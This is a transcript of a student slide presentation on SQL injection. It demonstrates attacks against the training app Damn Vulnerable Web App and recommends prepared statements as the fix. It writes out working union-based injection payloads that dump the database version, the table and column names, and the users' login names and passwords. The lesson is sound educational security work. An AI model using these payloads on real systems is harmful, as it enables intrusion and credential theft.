SQL Injection
Download
Report
Transcript SQL Injection
SQL Injection
By
Wenonah Abadilla
Topics
• What is SQL
• What is SQL Injection
• Damn Vulnerable Web App
• SQLI Demo
• Prepared Statements
What is SQL?
• Way you communicate with the database
• Structured Query Language
• Access and manipulate databases
• COSC 341 at IUP
What is SQL Injection?
• One of the most serious threats for Web Application
• Inject SQL commands into an SQL statement, via web page input.
• Alters an SQL statement and compromises the security of a web
application
• Common with PHP and ASP applications due to the prevalence of
older functional interfaces
• Occurs when
• Data enters a program from an untrusted source.
• The data used to dynamically construct a SQL query
• SQL Injection Harvesting
• SQL statements to render sensitive data
Types of SQLI
• Error Based
• Causes an error and gather information from the error
• Union Based
• Combine two or more SQL statements into one result
• Blind
• Asking a true or false question
Consequences of SQL Injection
• Confidentiality
• Authentication
• Authorization
• Integrity
Damn Vulnerable Web Site Demo
• PHP/MySQL web application
• Aid for security professionals
• Test skills and tools in a legal environment
• Help developers better understand the process of securing web applications
$getid = “SELECT first_name, last_name FROM users WHERE
user_id = ‘$id’”;
Basic Injection
Webpage is supposed to print ID, First name, and Surname
$getid = “SELECT first_name, last_name FROM users WHERE
user_id = ‘1’”;
Always True Scenario
• Saying display all records that are false and all
records that are true
• %’ – probably not equal to anything, and will be
false
• ‘0’=‘0’ – Is equal to true, because 0 will always
equal 0
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
‘0’=‘0’”;
Display Database Version
• Notice the last displayed line
• This is the version of the mysql
database
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
0=0 union select null, version() # “;
Display Database User
• Notice the last displayed line
• Name of the database user that
executed the behind the scenes
PHP code
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
0=0 union select null, user() # ;
Display Database Name
• Notice the last displayed line
• This is the name of the database
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
0=0 union select null, database() # ;
Display All Tables in the information_schema
• Displays all the tables in the
information_schema database
• INFORMATION_SCHEMA is the
informational database
• Stores information about all other
databases that the MySQL server
maintains
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
0=0 union select null, table_name from information_schema.tables #” ;
Display All User Tables in the
information_schema
• Displays all tables that start
with the prefix “user” in the
information_schema
database
• Quicker than looking
through the previous
output and manually
looking for user table
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0
union select null, table_name from information_schema.tables where table_name
like ‘user%’ #” ;
Display all Column fields in the User Table
• Displays all the columns in the users
table
• Notice- user_id, first_name,
last_name, user and password
column
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and
1=0 union select null, concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #” ;
Display column Field Contents in
the user table
• Successfully displayed all the necessary
authentication information in the
database
$getid = “SELECT first_name, last_name FROM
users WHERE user_id = ‘%' and 1=0 union select
null,concat(first_name,0x0a,last_name,0x0a,user,
0x0a,password) from users #” ;
Prepared Statements and Bound Parameters
• The query and the data are sent to the SQL server separately
• Parameterized statements, Parameterized SQL
• Template for SQL Statements
• Values can be plugged into the query after the query is “prepared”
and ready to be executed
• (?), Bound Parameters
• Placeholders where actual values are plugged in
Examples
Statements sets “?” to an actual value that
is stored in the id variable
PHP using PDO
Java using JDBC
Conclusion
• SQLI huge threat to web applications
• Use Prepared SQL Statements
• Download Damn Vulnerable Web App
Questions?
Reference Page
• "Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb. 2015.
<http://docs.oracle.com/cd/B10500_01/appdev.920/a96590/adg09dyn.htm>.
• "(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web.
17 Feb. 2015.
<http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/>.
• "PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb. 2015.
<http://www.w3schools.com/php/php_mysql_prepared_statements.asp>.
• "SQL Injection." OWASP. N.p., 14 Aug. 2014. Web. 19 Feb. 2015.
<https://www.owasp.org/index.php/SQL_Injection>.
• "SQL Injection." W3school. N.p., n.d. Web. 15 Feb. 2015.
<http://www.w3schools.com/sql/sql_injection.asp>.